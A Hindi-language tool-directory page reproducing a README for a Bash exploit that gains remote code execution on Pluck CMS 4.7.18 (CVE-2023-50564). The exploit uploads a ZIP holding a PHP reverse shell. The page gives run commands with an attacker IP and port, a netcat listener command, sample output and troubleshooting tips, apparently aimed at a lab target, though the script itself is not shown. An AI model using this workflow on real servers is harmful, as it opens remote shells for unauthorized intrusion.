Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564 — Pluck CMS 4.7.18 में दुर्भावनापूर्ण ZIP अपलोड के माध्यम से प्रमाणित दूरस्थ कोड निष्पादन को स्वचालित करने वाला Bash शोषण, CVE-2023-50564 के लिए PHP रिवर्स शेल ट्रिगर करता है। | Kitploit
उपकरण/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

Pluck CMS 4.7.18 में दुर्भावनापूर्ण ZIP अपलोड के माध्यम से प्रमाणित दूरस्थ कोड निष्पादन को स्वचालित करने वाला Bash शोषण, CVE-2023-50564 के लिए PHP रिवर्स शेल ट्रिगर करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
131 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2023-50564 - Pluck CMS v4.7.18 रिमोट कोड एक्सीक्यूशन (RCE) एक्सप्लॉइट

विवरण

यह स्क्रिप्ट Pluck CMS v4.7.18 में एक रिमोट कोड एक्सीक्यूशन (RCE) कमजोरी का शोषण करती है। यह कमजोरी एक दुर्भावनापूर्ण उपयोगकर्ता को सर्वर पर एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड करने और उसे निष्पादित करने की अनुमति देती है, जिससे लक्ष्य मशीन पर रिमोट कमांड निष्पादन प्राप्त होता है।

स्क्रिप्ट पूरी प्रक्रिया को निम्नलिखित तरीके से स्वचालित करती है:

  1. प्रदान किए गए क्रेडेंशियल का उपयोग करके Pluck CMS एडमिन पैनल में प्रमाणीकरण करना।
  2. एक ZIP फ़ाइल अपलोड करना जिसमें एक दुर्भावनापूर्ण रिवर्स शेल PHP स्क्रिप्ट हो।
  3. PHP रिवर्स शेल को निष्पादित करना, जिससे हमलावर को लक्ष्य मशीन पर रिमोट एक्सेस मिल जाता है।

नोट: स्क्रिप्ट को रिवर्स शेल प्राप्त करने के लिए हमलावर की मशीन पर Netcat लिसनर की आवश्यकता होती है।


पूर्वापेक्षाएँ

स्क्रिप्ट चलाने से पहले, निम्नलिखित सुनिश्चित करें:

  • Netcat स्थापित है और रिवर्स शेल प्राप्त करने के लिए एक लिसनर सेट किया गया है।
  • आपके पास रिवर्स शेल के लिए सही लक्ष्य होस्ट, पासवर्ड, IP पता, और पोर्ट है।
  • आपके पास लक्ष्य पर Pluck CMS एडमिन पैनल तक पहुंच है।

उपयोग

root@kitploit:~
./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>

तर्क:

  • -h <host>: लक्ष्य होस्ट (जैसे, greenhorn.htb)।
  • -P <password>: Pluck CMS एडमिन पैनल का पासवर्ड (जैसे, abcd123)।
  • -i <IP>: रिवर्स शेल प्राप्त करने के लिए हमलावर का IP पता।
  • -p <port>: वह पोर्ट जिस पर Netcat लिसनर रिवर्स शेल को कैप्चर करने के लिए चल रहा है।

उदाहरण:

root@kitploit:~
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001

चरण:

  1. Netcat लिसनर सेट करें: हमलावर की मशीन पर, निर्दिष्ट पोर्ट पर Netcat लिसनर शुरू करें:

    root@kitploit:~
    nc -nvlp <port>
    

    उदाहरण के लिए:

    root@kitploit:~
    nc -nvlp 9001
    
  2. स्क्रिप्ट चलाएं: स्क्रिप्ट को आवश्यक पैरामीटर प्रदान करें, जिनमें होस्ट, पासवर्ड, IP पता और पोर्ट शामिल हैं।

    root@kitploit:~
    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    
  3. स्क्रिप्ट निष्पादन:

    • स्क्रिप्ट Pluck CMS एडमिन पैनल में लॉग इन करती है।
    • यह एक ZIP फ़ाइल अपलोड करती है जिसमें एक रिवर्स शेल PHP स्क्रिप्ट (love.php) होती है।
    • ZIP फ़ाइल अपलोड होने के बाद, लक्ष्य पर रिवर्स शेल निष्पादित होता है, और आपके Netcat लिसनर से एक कनेक्शन स्थापित होता है।
    • एक साफ संदेश दिखाया जाएगा: "RCE is waiting for you, please go take a look.", और स्क्रिप्ट लिए गए समय को ट्रैक करने के बाद समाप्त हो जाएगी।
  4. लक्ष्य तक पहुंचें: एक बार रिवर्स शेल सक्रिय हो जाने पर, आपके Netcat लिसनर में कनेक्शन दिखाई देगा, जिससे आपको लक्ष्य मशीन पर रिमोट एक्सेस मिल जाएगा।


POC

image

आउटपुट उदाहरण

root@kitploit:~
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.

आवश्यकताएँ

  • cURL: Pluck CMS के साथ इंटरैक्ट करने और फ़ाइलें अपलोड करने के लिए।
  • Netcat: रिवर्स शेल सुनने के लिए।

यदि वे स्थापित नहीं हैं तो आप निम्नलिखित कमांड का उपयोग करके curl और netcat स्थापित कर सकते हैं:

Debian/Ubuntu:

root@kitploit:~
sudo apt update
sudo apt install curl netcat

Red Hat/CentOS/Fedora:

root@kitploit:~
sudo yum install curl nc

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और अधिकृत पेनिट्रेशन परीक्षण उद्देश्यों के लिए है। इस स्क्रिप्ट का अनधिकृत उपयोग अवैध और अनैतिक है। किसी सिस्टम पर किसी भी कमजोरी का शोषण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।


समस्या निवारण

  1. 504 Gateway Time-out: स्क्रिप्ट को रिवर्स शेल निष्पादित करने का प्रयास करते समय यह त्रुटि हो सकती है, लेकिन इससे शेल निष्पादन की सफलता पर कोई प्रभाव नहीं पड़ता है। त्रुटि आमतौर पर लक्ष्य सर्वर द्वारा HTTP अनुरोध का जवाब देने में अधिक समय लेने के कारण होती है, लेकिन शेल फिर भी काम करना चाहिए।

  2. Netcat लिसनर समस्याएं: यदि आपको रिवर्स शेल प्राप्त नहीं होता है, तो सुनिश्चित करें कि आपका IP पता और पोर्ट सही ढंग से सेट हैं, और कोई फ़ायरवॉल प्रतिबंध नहीं है जो लक्ष्य को आपकी मशीन से वापस कनेक्ट होने से रोक रहा हो।

  3. स्क्रिप्ट लॉगिन में विफल: यदि CMS एडमिन पैनल में लॉगिन विफल होता है, तो प्रदान किए गए पासवर्ड को सत्यापित करें और सुनिश्चित करें कि CMS लक्ष्य मशीन पर सुलभ है।


यदि आप README में कोई और अनुकूलन या स्पष्टीकरण चाहते हैं तो कृपया मुझे बताएं!

टूल डाउनलोड करें